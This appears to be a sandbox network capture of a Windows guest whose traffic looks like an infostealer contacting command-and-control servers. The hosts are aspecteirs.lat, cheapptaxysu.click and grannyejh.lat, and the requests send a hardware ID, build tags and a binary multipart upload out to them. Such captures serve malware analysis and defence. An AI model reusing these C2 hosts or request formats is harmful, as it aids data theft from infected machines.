2024-12-19 09:13:47 UTC	1369	IN	Data Raw: 71 6f 51 63 62 6c 61 72 64 4b 2f 41 73 78 71 71 6d 6e 6e 59 37 79 42 43 78 49 51 76 63 68 49 56 49 30 62 37 69 73 2f 70 56 67 38 4f 63 5a 68 62 35 51 73 46 48 69 45 54 4f 30 70 65 43 4b 79 65 78 4c 4c 45 77 45 6f 47 4a 70 45 48 70 74 6f 2b 4f 68 31 45 44 79 36 78 71 53 75 30 6e 30 52 4b 4d 48 66 4c 32 6a 70 39 71 41 37 55 6f 71 53 51 4b 39 61 53 4a 56 50 33 69 77 71 76 53 5a 59 4f 2f 69 46 6f 57 32 58 37 35 52 34 68 51 34 74 36 4c 68 67 73 43 72 43 6d 74 44 47 75 38 35 61 58 30 2f 65 72 79 76 37 39 5a 61 6f 76 64 58 6e 2f 5a 66 75 42 75 31 58 6a 53 2f 72 4f 53 4a 7a 2b 68 4d 49 46 59 43 76 57 63 6b 57 79 68 73 76 71 33 7a 6c 33 4c 6f 35 68 2b 46 76 31 4f 39 58 75 6f 61 66 50 54 76 34 4a 71 41 73 77 51 4b 53 51 6d 6a 61 7a 35 65 65 6e 58 31 75 72 6d 54 62 Data Ascii: qoQcblardK/AsxqqmnnY7yBCxIQvchIVI0b7is/pVg8OcZhb5QsFHiETO0peCKyexLLEwEoGJpEHpto+Oh1EDy6xqSu0n0RKMHfL2jp9qA7UoqSQK9aSJVP3iwqvSZYO/iFoW2X75R4hQ4t6LhgsCrCmtDGu85aX0/eryv79ZaovdXn/ZfuBu1XjS/rOSJz+hMIFYCvWckWyhsvq3zl3Lo5h+Fv1O9XuoafPTv4JqAswQKSQmjaz5eenX1urmTb
2024-12-19 09:13:47 UTC	1369	IN	Data Raw: 4a 75 31 54 30 46 61 30 5a 4a 50 72 33 70 36 6a 44 2f 30 63 68 42 6a 65 73 62 79 64 5a 4c 43 71 6b 37 65 44 55 5a 2b 36 6f 51 63 61 37 57 62 78 64 2f 78 45 78 75 61 48 70 6a 63 58 6b 54 43 74 45 44 36 70 6c 49 6c 55 35 5a 37 2b 78 38 35 52 6f 35 2b 6b 54 6a 50 59 57 39 46 7a 31 58 6d 54 36 6e 76 43 4a 67 74 35 48 4a 55 6f 46 75 53 45 32 45 43 4d 71 76 4b 2b 35 7a 43 44 76 34 42 79 44 75 56 6d 2b 56 65 67 55 4d 4c 4b 68 35 4a 44 50 37 30 51 6e 54 41 69 69 62 79 31 57 4d 32 47 77 70 66 6d 56 61 71 4b 6d 57 59 47 75 47 4f 77 62 32 52 6b 77 74 36 43 6c 74 38 50 6c 53 69 78 53 51 72 41 76 4d 42 34 39 5a 76 76 37 75 5a 68 70 34 75 4d 54 67 72 5a 66 75 56 37 75 47 54 2b 33 71 4f 32 4d 78 2b 39 49 49 6b 6b 45 72 32 59 74 57 79 68 76 73 71 2f 31 31 43 36 69 37 77 Data Ascii: Ju1T0Fa0ZJPr3p6jD/0chBjesbydZLCqk7eDUZ+6oQca7Wbxd/xExuaHpjcXkTCtED6plIlU5Z7+x85Ro5+kTjPYW9Fz1XmT6nvCJgt5HJUoFuSE2ECMqvK+5zCDv4ByDuVm+VegUMLKh5JDP70QnTAiiby1WM2GwpfmVaqKmWYGuGOwb2Rkwt6Clt8PlSixSQrAvMB49Zvv7uZhp4uMTgrZfuV7uGT+3qO2Mx+9IIkkEr2YtWyhvsq/11C6i7w
2024-12-19 09:13:47 UTC	1369	IN	Data Raw: 39 46 7a 68 58 6d 54 36 70 75 36 51 7a 75 56 4e 4a 6b 49 4b 71 47 38 6b 56 54 78 68 76 4b 54 2f 6d 57 6a 76 37 52 71 48 73 6c 4b 6d 57 4f 59 55 4d 62 44 76 71 63 4c 48 38 77 52 7a 42 43 57 6a 53 44 6c 46 4b 48 7a 37 76 4c 65 4e 49 4f 58 6b 57 64 37 32 57 37 74 53 34 68 59 30 74 61 44 6a 6a 4d 62 74 53 53 35 4c 43 4c 31 70 4a 31 4d 78 5a 62 43 78 2b 5a 6c 6b 37 75 77 52 6a 62 77 59 2b 68 76 71 42 6e 7a 69 37 39 4b 50 7a 2b 74 48 50 51 51 64 34 58 68 70 57 54 59 71 34 2b 50 31 6d 6d 44 74 35 42 57 4e 76 6c 6d 34 56 65 6f 62 4e 62 4b 6e 39 59 50 45 34 30 55 6c 53 77 4f 72 5a 43 78 61 50 57 36 39 72 4c 6e 61 49 4f 58 77 57 64 37 32 64 35 4e 75 72 7a 38 47 2b 72 43 70 6d 34 44 73 53 47 73 63 51 71 4e 69 4a 56 59 31 62 4c 4b 76 38 35 31 72 37 75 4d 64 69 72 39 Data Ascii: 9FzhXmT6pu6QzuVNJkIKqG8kVTxhvKT/mWjv7RqHslKmWOYUMbDvqcLH8wRzBCWjSDlFKHz7vLeNIOXkWd72W7tS4hY0taDjjMbtSS5LCL1pJ1MxZbCx+Zlk7uwRjbwY+hvqBnzi79KPz+tHPQQd4XhpWTYq4+P1mmDt5BWNvlm4VeobNbKn9YPE40UlSwOrZCxaPW69rLnaIOXwWd72d5Nurz8G+rCpm4DsSGscQqNiJVY1bLKv851r7uMdir9
2024-12-19 09:13:47 UTC	1369	IN	Data Raw: 42 38 36 71 4b 6a 75 6b 4d 37 6d 53 79 4e 4d 43 36 35 6c 4c 46 4d 38 5a 72 47 69 2f 70 70 75 36 71 68 58 78 72 46 41 39 41 4f 74 50 79 79 68 76 66 47 50 34 65 5a 4c 61 31 74 4d 74 69 45 75 55 6e 6f 79 2b 36 72 72 6b 47 33 77 34 52 36 49 75 56 75 6d 57 75 41 56 4c 72 32 67 34 34 58 4d 37 55 73 74 52 51 65 6c 62 53 35 62 4d 57 57 33 34 37 66 55 5a 2f 71 6f 51 63 61 59 55 36 64 4d 37 68 41 33 72 4c 53 6e 6e 59 37 79 42 43 78 49 51 76 63 68 4b 6c 55 78 62 72 75 76 2b 5a 42 74 34 76 6f 57 67 62 46 52 76 30 6e 6e 47 54 75 78 70 2b 79 4e 78 76 6c 49 4a 56 59 48 76 58 4e 70 45 48 70 74 6f 2b 4f 68 31 46 62 6c 2b 41 6d 46 39 47 6d 69 57 50 73 56 4d 62 62 76 2b 4d 7a 5a 71 30 4d 6e 42 46 72 76 5a 79 5a 58 4f 57 57 36 71 76 57 5a 5a 65 76 74 47 49 43 79 55 72 35 62 Data Ascii: B86qKjukM7mSyNMC65lLFM8ZrGi/ppu6qhXxrFA9AOtPyyhvfGP4eZLa1tMtiEuUnoy+6rrkG3w4R6IuVumWuAVLr2g44XM7UstRQelbS5bMWW347fUZ/qoQcaYU6dM7hA3rLSnnY7yBCxIQvchKlUxbruv+ZBt4voWgbFRv0nnGTuxp+yNxvlIJVYHvXNpEHpto+Oh1Fbl+AmF9GmiWPsVMbbv+MzZq0MnBFrvZyZXOWW6qvWZZevtGICyUr5b
2024-12-19 09:13:47 UTC	1369	IN	Data Raw: 58 68 2f 73 4c 48 35 77 52 7a 42 41 47 6f 59 69 68 55 4d 32 61 30 70 50 32 47 61 75 58 36 47 49 65 39 56 62 68 62 34 42 4d 32 75 36 62 71 6a 73 33 73 51 79 52 42 51 75 45 68 4c 6b 5a 36 4d 76 75 43 39 4a 39 73 75 62 4a 5a 6d 66 68 42 39 46 7a 68 58 6d 54 36 72 2b 32 48 79 75 5a 48 4a 45 63 51 72 6d 63 37 58 6a 64 67 71 61 6e 79 6b 57 33 76 35 52 71 41 73 46 4f 34 53 65 51 65 50 37 48 76 71 63 4c 48 38 77 52 7a 42 43 47 34 64 79 4e 5a 4e 6e 79 77 6f 76 71 43 62 66 4b 6f 56 38 61 6e 58 36 55 62 74 51 67 73 72 61 6a 34 7a 4e 6d 72 51 79 63 45 57 75 39 6e 49 46 67 39 62 4c 57 78 2f 4a 4a 76 37 65 45 51 67 72 35 62 74 46 2f 70 47 54 6d 35 6f 2b 79 46 77 2b 52 41 49 6b 6f 4c 6f 43 46 6e 48 6a 31 79 2b 2f 75 35 74 58 76 68 35 42 54 47 71 52 61 74 47 2b 6f 53 66 Data Ascii: Xh/sLH5wRzBAGoYihUM2a0pP2GauX6GIe9Vbhb4BM2u6bqjs3sQyRBQuEhLkZ6MvuC9J9subJZmfhB9FzhXmT6r+2HyuZHJEcQrmc7XjdgqanykW3v5RqAsFO4SeQeP7HvqcLH8wRzBCG4dyNZNnywovqCbfKoV8anX6UbtQgsraj4zNmrQycEWu9nIFg9bLWx/JJv7eEQgr5btF/pGTm5o+yFw+RAIkoLoCFnHj1y+/u5tXvh5BTGqRatG+oSf
2024-12-19 09:13:47 UTC	1369	IN	Data Raw: 61 67 4d 74 50 50 55 45 46 75 53 4d 63 58 54 52 6b 76 4c 57 35 69 31 2b 73 71 42 61 63 39 67 43 4e 51 71 30 5a 4d 50 72 33 70 35 66 48 36 30 4d 78 55 67 57 6a 63 43 4a 54 4e 6b 69 30 70 4f 2b 58 62 2b 48 35 45 4d 71 39 56 66 51 56 72 52 6b 6b 2b 76 65 6e 72 63 66 39 52 77 52 48 45 36 59 68 5a 78 34 39 66 50 76 37 75 61 6f 67 38 4f 73 4a 68 62 6c 4a 69 68 75 31 42 77 4c 36 70 50 47 46 30 4f 68 53 49 45 6b 4f 76 6c 39 70 42 6d 34 34 36 66 47 72 78 6e 2b 69 39 79 62 49 39 6c 6e 30 41 39 51 48 66 4b 7a 76 76 39 43 4f 71 31 5a 72 48 45 4c 6f 59 6a 74 4d 50 47 6d 74 6f 4c 36 71 58 73 58 2b 45 34 47 6d 58 36 4e 55 72 56 42 38 74 65 2b 2f 75 34 44 69 51 7a 42 56 46 4b 4a 78 4c 68 34 46 4a 50 75 37 75 63 77 67 31 2b 73 58 69 4c 46 4f 70 52 62 4b 43 44 61 39 76 2b Data Ascii: agMtPPUEFuSMcXTRkvLW5i1+sqBac9gCNQq0ZMPr3p5fH60MxUgWjcCJTNki0pO+Xb+H5EMq9VfQVrRkk+venrcf9RwRHE6YhZx49fPv7uaog8OsJhblJihu1BwL6pPGF0OhSIEkOvl9pBm446fGrxn+i9ybI9ln0A9QHfKzvv9COq1ZrHELoYjtMPGmtoL6qXsX+E4GmX6NUrVB8te+/u4DiQzBVFKJxLh4FJPu7ucwg1+sXiLFOpRbKCDa9v+
2024-12-19 09:13:47 UTC	1369	IN	Data Raw: 53 32 64 4b 43 61 39 6d 4f 55 67 68 4a 72 4f 67 34 34 35 65 33 4d 4d 56 67 4c 46 43 73 31 33 4c 50 6e 7a 30 37 2b 6a 43 6d 4e 49 45 59 77 51 39 34 53 45 78 48 6d 49 71 6a 71 44 33 6d 6d 66 30 2b 56 53 75 6c 57 4b 4f 47 63 45 5a 4b 66 69 62 34 4a 4c 52 34 45 6b 6e 42 45 7a 76 5a 32 6b 47 61 69 54 37 70 2b 6a 55 4f 4c 4b 36 51 74 50 6c 44 2b 51 4a 38 6c 41 6c 2b 72 6d 6e 32 70 4b 6c 42 44 6b 45 57 75 38 6d 4b 6b 77 6f 62 4c 69 31 2b 74 4e 65 33 4d 38 58 67 62 64 4f 70 45 7a 69 49 41 4b 76 72 4f 6d 4d 78 2f 31 56 61 77 70 43 6f 43 46 78 5a 33 6f 69 2b 35 79 33 31 48 69 69 73 46 6d 7a 74 56 61 36 58 50 73 50 63 5a 32 68 34 49 50 57 2b 31 4d 6b 42 45 7a 76 5a 32 6b 47 61 43 54 37 70 2b 6a 55 4f 4c 4b 36 51 74 50 6c 44 2b 51 4a 38 6c 41 6c 2b 72 6d 6e 32 70 4b Data Ascii: S2dKCa9mOUghJrOg445e3MMVgLFCs13LPnz07+jCmNIEYwQ94SExHmIqjqD3mmf0+VSulWKOGcEZKfib4JLR4EknBEzvZ2kGaiT7p+jUOLK6QtPlD+QJ8lAl+rmn2pKlBDkEWu8mKkwobLi1+tNe3M8XgbdOpEziIAKvrOmMx/1VawpCoCFxZ3oi+5y31HiisFmztVa6XPsPcZ2h4IPW+1MkBEzvZ2kGaCT7p+jUOLK6QtPlD+QJ8lAl+rmn2pK
2024-12-19 09:13:47 UTC	1369	IN	Data Raw: 30 43 50 5a 6a 39 64 65 69 54 37 72 37 6e 4d 49 4f 50 69 43 59 75 35 58 2f 68 63 39 78 6c 38 39 4f 2f 70 77 70 69 72 52 53 46 55 44 36 42 6d 5a 56 67 30 5a 50 75 38 74 34 30 67 39 4b 68 42 31 66 67 59 70 68 75 31 58 6e 75 35 76 66 57 45 77 2f 31 48 62 48 6f 38 67 6e 4d 75 54 6a 6b 6f 69 71 37 39 67 6e 58 68 2b 42 36 34 69 48 57 6d 58 50 30 64 66 6f 75 35 35 49 4c 4f 37 41 52 6c 42 42 72 76 4f 57 6c 7a 4b 47 32 72 6f 4c 6e 61 49 4f 36 6f 51 63 61 37 53 72 4e 4c 37 6c 49 37 6f 4b 69 6e 6e 59 37 79 42 44 30 45 57 76 77 76 61 55 78 36 4d 76 76 6b 39 35 6c 68 34 65 59 61 6c 4b 52 65 74 30 33 75 57 51 4b 45 67 76 57 46 30 4f 67 47 47 6b 6b 47 75 58 51 71 54 6a 31 55 68 59 37 72 6b 33 44 68 71 6a 57 42 75 31 53 4b 5a 64 6f 50 4f 36 72 74 77 59 48 57 36 41 52 6c Data Ascii: 0CPZj9deiT7r7nMIOPiCYu5X/hc9xl89O/pwpirRSFUD6BmZVg0ZPu8t40g9KhB1fgYphu1Xnu5vfWEw/1HbHo8gnMuTjkoiq79gnXh+B64iHWmXP0dfou55ILO7ARlBBrvOWlzKG2roLnaIO6oQca7SrNL7lI7oKinnY7yBD0EWvwvaUx6Mvvk95lh4eYalKRet03uWQKEgvWF0OgGGkkGuXQqTj1UhY7rk3DhqjWBu1SKZdoPO6rtwYHW6ARl

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.6	50321	104.21.66.85	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:13:40 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HQ8DUHZE4UC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19924 Host: aspecteirs.lat
2024-12-19 09:13:40 UTC	15331	OUT	Data Raw: 2d 2d 48 51 38 44 55 48 5a 45 34 55 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 51 38 44 55 48 5a 45 34 55 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 48 51 38 44 55 48 5a 45 34 55 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 56 6d 72 30 74 2d 2d 69 6e 73 74 61 6c 6c 73 0d 0a 2d 2d 48 51 38 44 55 48 5a 45 34 55 43 0d 0a 43 Data Ascii: --HQ8DUHZE4UCContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--HQ8DUHZE4UCContent-Disposition: form-data; name="pid"3--HQ8DUHZE4UCContent-Disposition: form-data; name="lid"CVmr0t--installs--HQ8DUHZE4UCC
2024-12-19 09:13:40 UTC	4593	OUT	Data Raw: 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: +?2+?2+?o?Mp5p_oI
2024-12-19 09:13:55 UTC	1129	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:13:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9ksln72qvf6cbv9ktisuvug462; expires=Mon, 14 Apr 2025 03:00:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xmY%2FAIk9sjWg%2F56eyE4JoHkDScz15oiVrDOJZ2x3YKeTUSfO7YES6ivf1bzPdNrtHoiXzQVBNEaJ7LGCetRs0wsNzY62Cw1U39VDz1ILqgzz5ZWkNER43kCYHJEz2ciYQA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f46472b3a3f7c8a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1943&rtt_var=739&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2831&recv_bytes=20877&delivery_rate=1469552&cwnd=241&unsent_bytes=0&cid=a336aa06803af45a&ts=15328&x=0"
2024-12-19 09:13:55 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:13:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.6	50324	172.67.177.88	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:13:43 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 77 Host: cheapptaxysu.click
2024-12-19 09:13:43 UTC	77	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 5a 4a 76 73 73 2d 2d 26 6a 3d 26 68 77 69 64 3d 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=CZJvss--&j=&hwid=86648A4BEF1E4DA3AC8923850305D13E
2024-12-19 09:13:57 UTC	1133	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:13:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ibn8esreavio4b6rh9l1oote5f; expires=Mon, 14 Apr 2025 03:00:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hrd7gK0lCg4Lh6zBslPJVdbjirdnj1pL5IJ9tXaOqpmv%2BgDn0%2Feb%2F%2B1TzWBspJqfrOCtMth0tcjtLjgyulS2EnZnGlMiimWKFmZ%2F7Z6BWIkMQmqldieNcXnVb5JofCoptnzqv3M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f46473d8b17439a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2200&min_rtt=2124&rtt_var=851&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=979&delivery_rate=1374764&cwnd=233&unsent_bytes=0&cid=21df19ad5bd9914c&ts=14748&x=0"
2024-12-19 09:13:57 UTC	54	IN	Data Raw: 33 30 0d 0a 33 70 6f 69 2b 47 6a 2f 49 42 39 4b 4e 4e 58 54 46 74 48 41 65 71 39 4d 67 48 48 73 66 48 63 2f 4a 61 74 57 74 43 72 4a 39 75 57 46 78 77 3d 3d 0d 0a Data Ascii: 303poi+Gj/IB9KNNXTFtHAeq9MgHHsfHc/JatWtCrJ9uWFxw==
2024-12-19 09:13:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.6	50325	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:13:43 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: grannyejh.lat
2024-12-19 09:13:43 UTC	87	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 26 6a 3d 26 68 77 69 64 3d 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 Data Ascii: act=get_message&ver=4.0&lid=yau6Na--6989783370&j=&hwid=86648A4BEF1E4DA300D57F9DDD37BE0C
2024-12-19 09:13:56 UTC	1117	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:13:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dj534sneeg8k1148hjs4jur88v; expires=Mon, 14 Apr 2025 03:00:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SDO7cCFbrNhoNPKqDHQkDTeEQJarCQY2d1PG9RIkEq3j6ncgfW6bJTWOEnncM3c507bMnqZHdfDQ%2BAlVJuQN2F5%2FK5Kdo5QNlZPvJ3vQAxjof6FKD2s5hh31mkCtKoIn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f46473e2a756a5b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1564&rtt_var=615&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=984&delivery_rate=1740166&cwnd=204&unsent_bytes=0&cid=4020ed22eabcabbf&ts=13122&x=0"
2024-12-19 09:13:56 UTC	54	IN	Data Raw: 33 30 0d 0a 5a 32 46 4e 4d 43 37 50 39 37 38 75 4a 2f 6d 37 52 5a 2b 78 49 55 66 5a 75 2b 61 54 4c 2b 42 61 48 7a 51 73 45 68 55 66 7a 6c 41 38 50 41 3d 3d 0d 0a Data Ascii: 30Z2FNMC7P978uJ/m7RZ+xIUfZu+aTL+BaHzQsEhUfzlA8PA==
2024-12-19 09:13:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.6	50327	20.198.119.143	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:13:47 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 50 76 51 78 73 37 56 34 42 6b 36 52 45 68 4b 38 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 35 31 35 64 35 36 33 38 38 37 33 30 39 32 64 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: PvQxs7V4Bk6REhK8.1Context: 8515d5638873092d
2024-12-19 09:13:47 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-19 09:13:47 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 50 76 51 78 73 37 56 34 42 6b 36 52 45 68 4b 38 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 35 31 35 64 35 36 33 38 38 37 33 30 39 32 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 57 45 57 56 32 4a 54 45 70 69 6e 50 78 34 5a 64 71 70 41 74 4a 67 79 58 76 6b 49 41 35 5a 34 50 43 67 66 69 63 68 62 34 34 52 6d 46 68 73 65 47 31 64 4f 68 76 54 53 2b 48 57 47 76 2f 58 36 55 6f 62 54 46 54 67 4a 35 43 54 6f 6b 30 52 6d 55 78 52 39 2b 57 51 7a 5a 58 33 43 49 2f 74 56 66 72 56 47 4f 2b 73 50 73 4d 5a 65 2b Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: PvQxs7V4Bk6REhK8.2Context: 8515d5638873092d<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARWEWV2JTEpinPx4ZdqpAtJgyXvkIA5Z4PCgfichb44RmFhseG1dOhvTS+HWGv/X6UobTFTgJ5CTok0RmUxR9+WQzZX3CI/tVfrVGO+sPsMZe+
2024-12-19 09:13:47 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 50 76 51 78 73 37 56 34 42 6b 36 52 45 68 4b 38 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 35 31 35 64 35 36 33 38 38 37 33 30 39 32 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: PvQxs7V4Bk6REhK8.3Context: 8515d5638873092d<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
